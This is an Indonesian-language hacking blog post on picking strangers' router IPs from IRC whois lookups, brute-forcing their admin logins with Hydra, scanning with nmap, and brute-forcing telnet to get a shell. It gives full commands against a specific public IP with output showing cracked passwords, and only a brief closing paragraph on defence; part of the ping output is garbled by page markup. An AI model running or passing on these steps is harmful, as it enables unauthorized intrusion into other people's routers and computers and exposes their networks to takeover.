salam streeters..
kali ini kita akan jabarkan cara mendapatkan username dan password router dengan hydra.
Apakah anda suka cari target di IRC untuk dihack router speedy atau di PC dibelakang router untuk pentest? Apakah anda masih mengandalkan target yang mengandalkan router speedy dengan keamanan password default yaitu user admin dan password admin ? Kalau anda masih mengandalkan metode serangan password default, maka disini penulis akan memberikan metode tambahan untuk anda yaitu metode brute force.
Disini penulis menggunakan tool Hydra. Hydra adalah tool untuk melakukan hacking password dengan menggunakan metode brute force, dengan anda memiliki kamus kata yang banyak yang dimungkinkan passwordnya ada di dalam kamus tersebut.
Di sini penulis contohkan misal kita join ke mIRC, kita contohkan saja nick ce_imutbgtt, nah whois aja itu nick dan kita akan mendapatkan IPnya.
atau bisa juga kita mengetahui IP router kita dengan cek arp-a misal router LAN 192.168.1.1 atau check IP public di checkmyip.com
Setelah kita dapatkan IPnya maka jalankan saja di browser IP address tersebut.
Setelah dijalankan http://180.254.70.135 maka akan tampil form window seperti dibawah ini
Jika menggunakan username admin dan password admin hasilnya adalah gagal maka anda akan dihadapkan pada 2 hal, terus maju atau tinggalkan target.
Jika anda ingin terus maju maka anda dapat menggunakan teknik brute force. Contohnya untuk melakukan exploitasi dengan hydra adalah
H:\hydra>hydra -m / -l admin -P data.txt 180.254.70.135 http-get
Hydra v6.0 (c) 2011 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org ) starting at 2011-10-17 14:27:56
[DATA] 11 tasks, 1 servers, 11 login tries (l:1/p:11), ~1 tries per task
[DATA] attacking service http-get on port 80
[STATUS] attack finished for 180.254.70.135 (waiting for childs to finish)
[80][www] host: 180.254.70.135 login: admin password: baseball
Hydra (http://www.thc.org ) finished at 2011-10-17 14:27:57
H:\hydra>
Setelah kita masuk ke router dengan password yang didapat, jika kita ingin melakukan hacking server di belakang router maka kita dapat melakukan IP Forwarding dari router ke Server yang berada dibelakang router.
Disini kita tidak tahu IP-IP lokal berapa saja dibelakang router, karena itu kita dapat mengujinya satu persatu dengan melakukan ping walaupun tidak jaminan.
Disini diasumsikan IP Servernya adalah 192.168.1.2 setelah kita ping dapat.
D:\>ping 180.254.70.135
Pinging 180.254.70.135 with 32 bytes of data:
Reply from 180.254.70.135: bytes=32 time<1ms data-blogger-escaped-180.254.70.135:="180.254.70.135:" data-blogger-escaped-bytes="32" data-blogger-escaped-c:="c:" data-blogger-escaped-dapat="dapat" data-blogger-escaped-dengan="dengan" data-blogger-escaped-diping="diping" data-blogger-escaped-from="from" data-blogger-escaped-jalan="jalan" data-blogger-escaped-kita="kita" data-blogger-escaped-maka="maka" data-blogger-escaped-melakukan="melakukan" data-blogger-escaped-mencoba="mencoba" data-blogger-escaped-ms="ms" data-blogger-escaped-nmap="nmap" data-blogger-escaped-reply="reply" data-blogger-escaped-scanning="scanning" data-blogger-escaped-setelah="setelah" data-blogger-escaped-time="time" data-blogger-escaped-ttl="254">nmap -v -A 180.254.70.135
Starting Nmap 5.21 ( http://nmap.org ) at 2011-10-17 15:28 Pacific Daylight Time
NSE: Loaded 36 scripts for scanning.
Initiating Ping Scan at 15:28
Scanning 180.254.70.135 [4 ports]
Completed Ping Scan at 15:28, 0.53s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:28
Completed Parallel DNS resolution of 1 host. at 15:28, 3.09s elapsed
Initiating SYN Stealth Scan at 15:28
Scanning 180.254.70.135 [1000 ports]
Discovered open port 23/tcp on 180.254.70.135
Discovered open port 80/tcp on 180.254.70.135
Discovered open port 3389/tcp on 180.254.70.135
Discovered open port 21/tcp on 180.254.70.135
Completed SYN Stealth Scan at 15:28, 2.34s elapsed (1000 total ports)
Disini dari scanning dengan NMAP kita mendapatkan adanya port 23 yaitu port untuk telnet server. Dengan aktifnya Telnet Server maka kita dapat melakukan brute force ke server Telnet dengan Hydra.
H:\hydra>hydra -l administrator -P data.txt 180.254.70.135 telnet
Hydra v6.0 (c) 2011 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org ) starting at 2011-10-17 15:21:22
[DATA] 6 tasks, 1 servers, 6 login tries (l:1/p:6), ~1 tries per task
[DATA] attacking service telnet on port 23
[STATUS] attack finished for 180.254.70.135 (waiting for childs to finish)
[23][telnet] host: 180.254.70.135 login: administrator password: sepakbola
Hydra (http://www.thc.org ) finished at 2011-10-17 15:21:26
Binggo, kita mendapatkan password telnetnya.
Masukkan login dan passwordnya dan kita akan mendapatkan shell dari telnet server. Contohnya :
Setelah kita klik Open. Masukkan login dan passwordnya.
Binggo, kita masuk ke shell server. :D
Untuk download Hydra. http://0xa.li/files/hydra-6.0-windows.zip . Untuk cari kamusnya untuk brute force dapat dicari sendiri di google, jika ingin buat sendiri juga boleh. Cayooo!
Pengamanannya jika anda ingin tetap dapat dipanggil router speedynya dari luar, maka anda dapat membuat password yang susah ditebak dengan berbagai kombinasi huruf dan angka yang kompleks tapi tetap mudah diingat. Jika ingin lebih aman lagi ya tidak perlu membuat router speedy bisa diakses dari internet, caranya misal dengan melempar port 80 ke IP lain yang kosong atau tidak dipakai.
Saya tidak bertanggung sama sekali atas semua hal-hal yang diakibatkan oleh artikel ini.<!--1ms-->